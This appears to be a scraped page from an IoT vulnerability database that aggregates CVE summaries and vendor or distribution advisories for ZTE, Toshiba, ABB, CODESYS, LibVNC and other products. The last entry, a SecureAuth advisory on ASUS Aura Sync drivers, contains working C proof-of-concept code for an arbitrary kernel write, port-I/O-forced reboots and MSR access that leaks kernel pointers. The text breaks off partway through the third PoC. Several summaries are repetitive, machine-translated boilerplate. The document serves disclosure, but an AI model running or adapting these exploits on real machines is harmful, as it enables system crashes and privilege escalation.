VARIoT IoT vulnerabilities database

All versions up to ZXCLOUD iRAI V5.01.05 of the ZTE uSmartView product are impacted by untrusted search path vulnerability, which may allow an unauthorized user to perform unauthorized operations. ZXCLOUD iRAI Contains an unreliable search path vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE uSmartView is China's ZTE Corporation ( ZTE ) company's cloud office desktop

On BIG-IP AAM 13.0.0 or 12.1.0-12.1.3.7, the dcdb_convert utility used by BIG-IP AAM fails to drop group permissions when executing helper scripts, which could be used to leverage attacks against the BIG-IP system. BIG-IP AAM Contains a permission vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. F5 BIG-IP AAM is an application acceleration manager of F5 company in the United States. A security vulnerability exists in the dcdb_convert utility in F5 BIG-IP AAM versions 13.0.0 and 12.1.0 through 12.1.3.7. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements

An issue was discovered in several Bosch Smart Home cameras (360 degree indoor camera and Eyes outdoor camera) with firmware before 6.52.4. A malicious client could potentially succeed in the unauthorized execution of code on the device via the network interface, because there is a buffer overflow in the RCP+ parser of the web server

The product CMS-770 (Software Versions 1.7.1 and prior)is vulnerable that an attacker can read sensitive configuration files by bypassing the user authentication mechanism. CMS-770 Contains an authentication vulnerability.Information may be obtained. The CMS-770 is a multi-loop monitoring system from ABB for monitoring the branch circuit of electrical systems. An authentication bypass vulnerability exists in ABB CMS-770 1.7.1 and earlier. ABB CMS-770 is prone to an authentication-bypass vulnerability. ABB CMS-770 versions 1.7.1 and prior are vulnerable

Toshiba Home gateway HEM-GW16A 1.2.9 and earlier, Toshiba Home gateway HEM-GW26A 1.2.9 and earlier uses hard-coded credentials, which may allow an attacker on the same network segment to login to the administrators settings screen and change the configuration or execute arbitrary OS commands. Home gateway provided by Toshiba Lighting & Technology Corporation contains multiple vulnerabilities listed below. * Improper access control (CWE-284) - CVE-2018-16197 * Hidden functionality (CWE-912) - CVE-2018-16198 * Cross-site scripting (CWE-79) - CVE-2018-16199 * OS command injection (CWE-78) - CVE-2018-16200 * Hard-coded credentials (CWE-798) - CVE-2018-16201 The following researchers reported the vulnerabilities to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. CVE-2018-16197 Toshitsugu Yoneyama, Yutaka Kokubu, and Daiki Ichinose of Mitsui Bussan Secure Directions, Inc. CVE-2018-16198, CVE-2018-16199 Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. CVE-2018-16200, CVE-2018-16201 Yutaka Kokubu of Mitsui Bussan Secure Directions, Inc.* The information and files stored on the affected device may be accessed. - CVE-2018-16197, CVE-2018-16201 * The affected device may be operated by an attacker. - CVE-2018-16198, CVE-2018-16201 * An arbitrary script may be executed on the user's web browser. - CVE-2018-16199 * An arbitrary OS command may be executed on the affected device. - CVE-2018-16200, CVE-2018-16201. TOSHIBA Home gateway HEM-GW26A and HEM-GW16A are home gateway products of Japan Toshiba (TOSHIBA) company. The vulnerability is caused by the use of hard-coded credentials in the program. An attacker could exploit this vulnerability to log in to the administrator settings page, change configurations, or execute arbitrary operating system commands

Cross-site scripting vulnerability in Toshiba Home gateway HEM-GW16A 1.2.9 and earlier, Toshiba Home gateway HEM-GW26A 1.2.9 and earlier allows an remote attacker to inject arbitrary web script or HTML via unspecified vectors. Home gateway provided by Toshiba Lighting & Technology Corporation contains multiple vulnerabilities listed below. * Improper access control (CWE-284) - CVE-2018-16197 * Hidden functionality (CWE-912) - CVE-2018-16198 * Cross-site scripting (CWE-79) - CVE-2018-16199 * OS command injection (CWE-78) - CVE-2018-16200 * Hard-coded credentials (CWE-798) - CVE-2018-16201 The following researchers reported the vulnerabilities to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. CVE-2018-16197 Toshitsugu Yoneyama, Yutaka Kokubu, and Daiki Ichinose of Mitsui Bussan Secure Directions, Inc. CVE-2018-16198, CVE-2018-16199 Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. CVE-2018-16200, CVE-2018-16201 Yutaka Kokubu of Mitsui Bussan Secure Directions, Inc.* The information and files stored on the affected device may be accessed. - CVE-2018-16197, CVE-2018-16201 * The affected device may be operated by an attacker. - CVE-2018-16198, CVE-2018-16201 * An arbitrary script may be executed on the user's web browser. - CVE-2018-16199 * An arbitrary OS command may be executed on the affected device. - CVE-2018-16200, CVE-2018-16201

Toshiba Home gateway HEM-GW16A 1.2.9 and earlier, Toshiba Home gateway HEM-GW26A 1.2.9 and earlier allows an attacker on the same network segment to bypass access restriction to access the information and files stored on the affected device. Home gateway provided by Toshiba Lighting & Technology Corporation contains multiple vulnerabilities listed below. * Improper access control (CWE-284) - CVE-2018-16197 * Hidden functionality (CWE-912) - CVE-2018-16198 * Cross-site scripting (CWE-79) - CVE-2018-16199 * OS command injection (CWE-78) - CVE-2018-16200 * Hard-coded credentials (CWE-798) - CVE-2018-16201 The following researchers reported the vulnerabilities to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. CVE-2018-16197 Toshitsugu Yoneyama, Yutaka Kokubu, and Daiki Ichinose of Mitsui Bussan Secure Directions, Inc. CVE-2018-16198, CVE-2018-16199 Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. CVE-2018-16200, CVE-2018-16201 Yutaka Kokubu of Mitsui Bussan Secure Directions, Inc.* The information and files stored on the affected device may be accessed. - CVE-2018-16197, CVE-2018-16201 * The affected device may be operated by an attacker. - CVE-2018-16198, CVE-2018-16201 * An arbitrary script may be executed on the user's web browser. - CVE-2018-16199 * An arbitrary OS command may be executed on the affected device. - CVE-2018-16200, CVE-2018-16201. An access control error vulnerability exists in TOSHIBAHomeGatewayHEM-GW26A1.2.9 and earlier and TOSHIBAHomeGateway 1.2.9 and earlier

Toshiba Home gateway HEM-GW16A 1.2.9 and earlier, Toshiba Home gateway HEM-GW26A 1.2.9 and earlier may allow an attacker on the same network segment to access a non-documented developer screen to perform operations on the affected device. Home gateway provided by Toshiba Lighting & Technology Corporation contains multiple vulnerabilities listed below. * Improper access control (CWE-284) - CVE-2018-16197 * Hidden functionality (CWE-912) - CVE-2018-16198 * Cross-site scripting (CWE-79) - CVE-2018-16199 * OS command injection (CWE-78) - CVE-2018-16200 * Hard-coded credentials (CWE-798) - CVE-2018-16201 The following researchers reported the vulnerabilities to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. CVE-2018-16197 Toshitsugu Yoneyama, Yutaka Kokubu, and Daiki Ichinose of Mitsui Bussan Secure Directions, Inc. CVE-2018-16198, CVE-2018-16199 Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. CVE-2018-16200, CVE-2018-16201 Yutaka Kokubu of Mitsui Bussan Secure Directions, Inc.* The information and files stored on the affected device may be accessed. - CVE-2018-16197, CVE-2018-16201 * The affected device may be operated by an attacker. - CVE-2018-16198, CVE-2018-16201 * An arbitrary script may be executed on the user's web browser. - CVE-2018-16199 * An arbitrary OS command may be executed on the affected device. - CVE-2018-16200, CVE-2018-16201. TOSHIBA Home Gateway HEM-GW26A and TOSHIBA Home Gateway HEM-GW16A are home gateway products of Japan Toshiba (TOSHIBA)

Toshiba Home gateway HEM-GW16A 1.2.9 and earlier, Toshiba Home gateway HEM-GW26A 1.2.9 and earlier allows an attacker on the same network segment to execute arbitrary OS commands. Home gateway provided by Toshiba Lighting & Technology Corporation contains multiple vulnerabilities listed below. * Improper access control (CWE-284) - CVE-2018-16197 * Hidden functionality (CWE-912) - CVE-2018-16198 * Cross-site scripting (CWE-79) - CVE-2018-16199 * OS command injection (CWE-78) - CVE-2018-16200 * Hard-coded credentials (CWE-798) - CVE-2018-16201 The following researchers reported the vulnerabilities to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. CVE-2018-16197 Toshitsugu Yoneyama, Yutaka Kokubu, and Daiki Ichinose of Mitsui Bussan Secure Directions, Inc. CVE-2018-16198, CVE-2018-16199 Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. CVE-2018-16200, CVE-2018-16201 Yutaka Kokubu of Mitsui Bussan Secure Directions, Inc.* The information and files stored on the affected device may be accessed. - CVE-2018-16197, CVE-2018-16201 * The affected device may be operated by an attacker. - CVE-2018-16198, CVE-2018-16201 * An arbitrary script may be executed on the user's web browser. - CVE-2018-16199 * An arbitrary OS command may be executed on the affected device. - CVE-2018-16200, CVE-2018-16201. An operating system command injection vulnerability exists in TOSHIBAHomeGatewayHEM-GW26A1.2.9 and earlier and TOSHIBAHomeGatewayHEM-GW16A1.2.9 and earlier

A vulnerability in the authorization subsystem of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, but unprivileged (levels 0 and 1), remote attacker to perform privileged actions by using the web management interface. The vulnerability is due to improper validation of user privileges when using the web management interface. An attacker could exploit this vulnerability by sending specific HTTP requests via HTTPS to an affected device as an unprivileged user. An exploit could allow the attacker to retrieve files (including the running configuration) from the device or to upload and replace software images on the device. A remote attacker can exploit this issue to gain elevated privileges on the affected devices. This issue is tracked by Cisco Bug ID CSCvm53531. The authorization subsystem is one of the authorization subsystems

LibVNC before commit a83439b9fbe0f03c48eb94ed05729cb016f8b72f contains multiple heap out-of-bound write vulnerabilities in VNC client code that can result remote code execution. LibVNC Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. LibVNCServer is prone to an multiple heap-based buffer-overflow vulnerabilities. Attackers can exploit these issues to execute arbitrary code within the context of the user running the affected application. Failed attempts will likely cause a denial-of-service condition. Versions prior to LibVNCServer 0.9.12 are vulnerable. For the stable distribution (stretch), these problems have been fixed in version 0.9.11+dfsg-1.3~deb9u1. We recommend that you upgrade your libvncserver packages. For the detailed security status of libvncserver please refer to its security tracker page at: https://security-tracker.debian.org/tracker/libvncserver Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlxXVEVfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0QnFA/+OdqSdVFFyBtT3WnOMUez7pBsk3wx0rzbCZ5uBJHYzr0ogMgDInL4GwdW RrTvSQtpKiUjmN4tfocXxKiWq6/KVZ5wgfYCeIjzzSr8qQHqYnV9NH2A8bUpVFAp M04zpV/zqPd2vlUPkppigHCyemV7sRuaXikGyUYm4Y6zBEhSg2vfyqfFmoggKoq8 aD6cWtKgCW3aSALA52JlVn5cPz17xvrk1zfStgtLPjHZTMHW19fDXq1hubxfR3q1 66LEfcs+13BFZW+09/eYSsC5vM96s4AfshErjtwpMxtVnc9MEIRNfRM9kfteaRvi s60EmM7xFvbx9acIQgKnLNNyjExzjySmgO0Bq7GNBu0gK1wNVpnOHI9EtBLfjOE7 YrYOxvwyTI5jFS0Txl846/dXwxy6gcX/bTlO6mqQFUicJcr7DU4GflHrt/t15VcK e7DBeWlhzV7yBoxC5yjS37dug0Ab9A9+TpCRxD5jwMWHZ3g+/8oXybCEqpuFwrqb kS1L4op0CHvouGbRldEtFookQud5deuqbEGxScGvOr8buENpnQmc6fzDh3jMH2wZ BNUHPzIYJHKqMXCK41jUB40/0v5iz5z5gHvRYfo8+ZOoLIFCp7zER3RDxwR8fGiK tqycmFiHaax09jHvqffRbwARfVrrrNbh4u/F7n3WWpbIsCjPOC4mI2 -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201908-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: LibVNCServer: Multiple vulnerabilities Date: August 09, 2019 Bugs: #659560, #673508 ID: 201908-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in LibVNCServer, the worst of which could result in the arbitrary execution of code. Background ========== LibVNCServer/LibVNCClient are cross-platform C libraries that allow you to easily implement VNC server or client functionality in your program. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/libvncserver < 0.9.12 >= 0.9.12 Description =========== Multiple vulnerabilities have been discovered in LibVNCServer. Please review the CVE identifiers referenced below for details. Impact ====== Please review the referenced CVE identifiers for details. Workaround ========== There is no known workaround at this time. Resolution ========== All LibVNCServer users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/libvncserver-0.9.12" References ========== [ 1 ] CVE-2018-20019 https://nvd.nist.gov/vuln/detail/CVE-2018-20019 [ 2 ] CVE-2018-20020 https://nvd.nist.gov/vuln/detail/CVE-2018-20020 [ 3 ] CVE-2018-20021 https://nvd.nist.gov/vuln/detail/CVE-2018-20021 [ 4 ] CVE-2018-20022 https://nvd.nist.gov/vuln/detail/CVE-2018-20022 [ 5 ] CVE-2018-20023 https://nvd.nist.gov/vuln/detail/CVE-2018-20023 [ 6 ] CVE-2018-20024 https://nvd.nist.gov/vuln/detail/CVE-2018-20024 [ 7 ] CVE-2018-7225 https://nvd.nist.gov/vuln/detail/CVE-2018-7225 [ 8 ] CVE-2018-7226 https://nvd.nist.gov/vuln/detail/CVE-2018-7226 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201908-05 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2019 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . ========================================================================= Ubuntu Security Notice USN-4587-1 October 20, 2020 italc vulnerabilities ========================================================================= A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 16.04 LTS Summary: Several security issues were fixed in iTALC. Software Description: - italc: didact tool which allows teachers to view and control computer labs Details: Nicolas Ruff discovered that iTALC had buffer overflows, divide-by-zero errors and didn't check malloc return values. (CVE-2016-9941, CVE-2016-9942) It was discovered that iTALC had an out-of-bounds write, multiple heap out-of-bounds writes, an infinite loop, improper initializations, and null pointer vulnerabilities. (CVE-2018-15127, CVE-2018-20019, CVE-2018-20020, CVE-2018-20021, CVE-2018-20022, CVE-2018-20023, CVE-2018-20024, CVE-2018-20748, CVE-2018-20749, CVE-2018-20750, CVE-2018-7225, CVE-2019-15681) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 16.04 LTS: italc-client 1:2.0.2+dfsg1-4ubuntu0.1 italc-master 1:2.0.2+dfsg1-4ubuntu0.1 libitalccore 1:2.0.2+dfsg1-4ubuntu0.1 In general, a standard system update will make all the necessary changes. References: https://usn.ubuntu.com/4587-1 CVE-2014-6051, CVE-2014-6052, CVE-2014-6053, CVE-2014-6054, CVE-2014-6055, CVE-2016-9941, CVE-2016-9942, CVE-2018-15127, CVE-2018-20019, CVE-2018-20020, CVE-2018-20021, CVE-2018-20022, CVE-2018-20023, CVE-2018-20024, CVE-2018-20748, CVE-2018-20749, CVE-2018-20750, CVE-2018-7225, CVE-2019-15681 Package Information: https://launchpad.net/ubuntu/+source/italc/1:2.0.2+dfsg1-4ubuntu0.1

WebAccess/SCADA, WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1. Lack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. WebAccess/SCADA Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in Advantech WebAccess/SCADA version 8.3.2 based on the Windows 2008 R2 SP1 platform that could allow an attacker to execute arbitrary code or cause a denial of service in the context of an affected application. Advantech WebAccess/SCADA is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely cause denial-of-service conditions. Advantech WebAccess/SCADA version 8.3.2 is vulnerable

Improper Communication Address Filtering exists in CODESYS V3 products versions prior V3.5.14.0. CODESYS V3 There are unspecified vulnerabilities in the product.Information may be obtained. 3S-Smart CODESYS Control for BeagleBone, etc. are all German 3S-Smart Software Solutions company's programming software for industrial control system development. A security vulnerability exists in several 3S-Smart Software Solutions products, which stems from programs that do not properly restrict communication channels. An attacker could use this vulnerability to impersonate the source of a communication packet. The following products are affected: 3S-Smart CODESYS Control for BeagleBone, CODESYS Control for emPC-A / iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (part of CODESYS Development System setup), CODESYS Control V3 Runtime System Toolkit, CODESYS V3 Embedded Target Visu Toolkit, CODESYS V3 Remote Target Visu Toolkit, CODESYS V3 Safety SIL2, CODESYS Gateway V3, CODESYS HMI V3, CODESYS OPC Server V3, CODESYS PLCHandler SDK, CODESYS V3 Development System, CODESYS V3 Simulation Runtime (part of CODESYS Development System). 3S-Smart Software CODESYS is prone to the following security vulnerabilities: 1. An insecure random number generator weakness 3. A spoofing vulnerability An attacker can exploit these vulnerabilities to bypass security restrictions and perform certain unauthorized actions and to insert and display spoofed content. Other attacks are also possible

Use of Insufficiently Random Values exists in CODESYS V3 products versions prior V3.5.14.0. CODESYS The product contains an insufficient random value usage vulnerability.Information may be obtained. 3S-Smart CODESYS Control for BeagleBone, etc. are all German 3S-Smart Software Solutions company's programming software for industrial control system development. A number of 3S-Smart Software Solutions products have security vulnerabilities that result from programs using values with insufficient randomness. An attacker could use this vulnerability to affect the confidentiality and integrity of the data. The following products are affected: 3S-Smart CODESYS Control for BeagleBone; CODESYS Control for emPC-A / iMX6; CODESYS Control for IOT2000; CODESYS Control for Linux; CODESYS Control for PFC100; CODESYS Control for PFC200; CODESYS Control for Raspberry Pi; CODESYS Control RTE V3; CODESYS Control RTE V3 (for Beckhoff CX); CODESYS Control Win V3 (part of CODESYS Development System setup); CODESYS Control V3 Runtime System Toolkit; CODESYS V3 Embedded Target Visu Toolkit; CODESYS V3 Remote Target Visu Toolkit; CODESYS V3 Safety SIL2; CODESYS Gateway V3; CODESYS HMI V3; CODESYS OPC Server V3; CODESYS PLCHandler SDK; CODESYS V3 Development System; CODESYS V3 Simulation Runtime (part of CODESYS Development System). 3S-Smart Software CODESYS is prone to the following security vulnerabilities: 1. An insecure random number generator weakness 3. A spoofing vulnerability An attacker can exploit these vulnerabilities to bypass security restrictions and perform certain unauthorized actions and to insert and display spoofed content. Other attacks are also possible

Pluto Safety PLC Gateway Ethernet devices ABB GATE-E1 and GATE-E2 all versions do not allow authentication to be configured on administrative telnet or web interfaces, which could enable various effects vectors, including conducting device resets, reading or modifying registers, and changing configuration settings such as IP addresses. ABB GATE-E1 and GATE-E2 Is vulnerable to a lack of authentication for critical functions.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ABB GATE-E2 is prone to a cross-site scripting vulnerability and an authentication-bypass vulnerability. Attackers can exploit these issues to execute arbitrary code in the context of the browser, obtain sensitive information; other attacks may also be possible. Both ABB GATE-E1 and GATE-E2 are Ethernet gateway devices of Swiss ABB Company. A security vulnerability exists in ABB GATE-E1 (EOL 2013) and GATE-E2 (EOL OCT 2018), which stems from the fact that the device does not allow authentication to be configured on the management telnet or web interface. An attacker could exploit this vulnerability to reset the device, read or modify the registry, and modify configuration settings such as the IP address

Pluto Safety PLC Gateway Ethernet devices in ABB GATE-E1 and GATE-E2 all versions allows an unauthenticated attacker using the administrative web interface to insert an HTML/Javascript payload into any of the device properties, which may allow an attacker to display/execute the payload in a visitor browser. ABB GATE-E1 and GATE-E2 Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ABBGATE-E1 and GATE-E2 are Ethernet gateway devices from ABB, Switzerland. A cross-site scripting vulnerability exists in ABBGATE-E1 (EOL2013) and GATE-E2 (EOLOCT2018) that can be exploited by remote attackers to inject HTML/Javascript payloads into arbitrary device properties and display them in the guest's browser. Execution load. Attackers can exploit these issues to execute arbitrary code in the context of the browser, obtain sensitive information; other attacks may also be possible

The Asusgio low-level driver in ASUS Aura Sync v1.07.22 and earlier exposes functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code. ASUS Aura Sync Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Asus Aura Sync is prone to multiple arbitrary code-execution vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions. ASUS Aura Sync 1.07.22 is vulnerable; other versions may also be affected. SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ ASUS Drivers Elevation of Privilege Vulnerabilities *1. *Advisory Information** Title: ASUS Drivers Elevation of Privilege Vulnerabilities Advisory ID: CORE-2017-0012 Advisory URL: http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities Date published: 2018-12-18 Date of last update: 2018-12-18 Vendors contacted: Asus Release mode: User release *2. *Vulnerability Information** Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535 *3. *Vulnerability Description** ASUS offers several drivers and utilities [1] in order to give the user more control over certain settings and functions of the motherboard. In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox, combining and controlling the LEDs of all your Aura-enabled products from a single application to achieve perfect, synchronized harmony. From motherboards and RGB strips to graphics cards and beyond, Aura Sync enables a veritable symphony of light for ultimate personalization. *4. *Vulnerable Packages** . *5. *Vendor Information, Solutions and Workarounds** The vendor did not provide fixes or workaround information. *6. *Credits** These vulnerabilities were discovered and researched by Diego Juarez. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. *7. *Technical Description / Proof of Concept Code** Aura Sync is ASUS's command software for all their line of recent RGB lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc). The main subject of this advisory are two of the device drivers installed/loaded by the Aura Sync application. From now on addressed as "Asusgio" and "GLCKIo". Default installation allows non-privileged user processes (even running at LOW INTEGRITY) to get a HANDLE and issue IOCTL codes to these drivers. The following sections describe the problems found. *7.1. *Arbitrary ring0 write** [CVE-2018-18537] There is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050) on GLCKIo leading to write of arbitrary DWORD to an arbitrary address. /----- .text:FFFFF800B09F13FE loc_FFFFF800B09F13FE: .text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38] ; CONTROLLED VALUE .text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56] ; CONTROLLED VALUE .text:FFFFF800B09F140A mov [rax], ecx ; Arbitrary DWORD sized write! .text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp] .text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4 .text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D -----/ Proof of Concept: /----- #include <windows.h> HANDLE ghDriver = 0; #define IOCTL_GLCKIO_VMWRITE 0x80102050 typedef struct _STRUCT_GLCKIO_VMWRITE { WORD unk0; DWORD unk1_1; WORD unk1_2; ULONG64 unk2; ULONG64 unk3; ULONG64 unk4; ULONG64 unk5; ULONG64 unk6; } STRUCT_GLCKIO_VMWRITE; BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value) { STRUCT_GLCKIO_VMWRITE mystructIn = { 0 }; mystructIn.unk0 = 0xf11; mystructIn.unk1_1 = value; // value mystructIn.unk5 = dest; // address STRUCT_GLCKIO_VMWRITE mystructOut = { 0 }; DWORD returned = 0; DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut), &returned, NULL); return BOOL(returned); } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n"); if (!InitDriver()) { exit(0); } printf("press ENTER for instant BSOD\n"); getchar(); ArbitraryWriteDWORD(0, 0xffffffff); CloseHandle(ghDriver); return 0; } -----/ *7.2. *Port mapped I/O access** [CVE-2018-18536] Both GLCKIo and Asusgio expose a functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges. /----- // This harmless PoC only reboots the PC, much more sinister stuff // would also be possible by abusing this functionality. // Compile for 32bit!!! Asusgio apparently has a bug preventing this // functionality to work unless IoIs32bitProcess == TRUE. They set rdx // as a pointer instead of a port number on the in/out instruction... // and they ONLY do this incorrectly in the x64 process specific code.(!?) #include "stdafx.h" #include <windows.h> // for \\.\glckio #define IOCTL_GLCKIO_WRITEPORT 0x80102054 #define IOCTL_GLCKIO_READPORT 0x80102050 // for \\.\Asusgio #define IOCTL_ASIO_PORTREADB 0xA0406400 #define IOCTL_ASIO_PORTWRITEB 0xA040A440 HANDLE ghDriver = 0; typedef BYTE(*fnPMIOReadB)(WORD port); typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value); #pragma pack (push,1) typedef struct { DWORD DriverIndex; // DriverEnum index BYTE DeviceName[MAX_PATH]; fnPMIOReadB pPMIOReadB; fnPMIOWriteB pPMIOWriteB; } AutoConfigStruct; AutoConfigStruct gConfig = { 0 }; enum DriverEnum { ASIO = 1, GLCKIO, }; typedef struct _ASIO_PORTIO_STRUCT { DWORD port; ULONG64 value; } ASIO_PORTIO_STRUCT; typedef struct _GLCKIO_PORTIO_STRUCT { WORD port; DWORD value; DWORD datalen; } GLCKIO_PORTIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ BYTE outbuffer[0x30] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ BYTE GLCKIO_PMIOReadB(WORD port) { GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1}; IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10) } BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value) { GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 }; IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10) } BYTE ASIO_PMIOReadB(WORD port) { ASIO_PORTIO_STRUCT inbuffer = { port, 0 }; IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4) } BYTE ASIO_PMIOWriteB(WORD port, BYTE value) { ASIO_PORTIO_STRUCT inbuffer = { port, value }; IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5) } void Reboot() { BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6; gConfig.pPMIOWriteB(0xcf9, cf9 | 2); Sleep(50); gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe); Sleep(50); } BOOL InitDriver() { char *szDeviceNames[] = { "\\\\.\\Asusgio" , "\\\\.\\GLCKIo" }; BYTE i = 0; for (i = 0; i<2; i++) { ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError()); continue; } gConfig.DriverIndex = i+1; memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1); break; } switch (gConfig.DriverIndex) { case DriverEnum::ASIO: { gConfig.pPMIOReadB = (fnPMIOReadB)ASIO_PMIOReadB; gConfig.pPMIOWriteB = (fnPMIOWriteB)ASIO_PMIOWriteB; } break; case DriverEnum::GLCKIO: { gConfig.pPMIOReadB = (fnPMIOReadB)GLCKIO_PMIOReadB; } gConfig.pPMIOWriteB = (fnPMIOWriteB)GLCKIO_PMIOWriteB; break; default: break; } return gConfig.DriverIndex ? TRUE : FALSE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (PMIO access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName, (DWORD)ghDriver); printf("press ENTER for hard reset..."); getchar(); Reboot(); CloseHandle(ghDriver); } -----/ *7.3. Proof of Concept: /----- // This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR // register value (leaks a kernel function pointer bypassing KASLR) and // then writing garbage to it (instant BSOD!) #include <windows.h> // for \\.\Asusgio #define IOCTL_ASIO_RDMSR 0xA0406458 #define IOCTL_ASIO_WRMSR 0xA040A45C HANDLE ghDriver = 0; 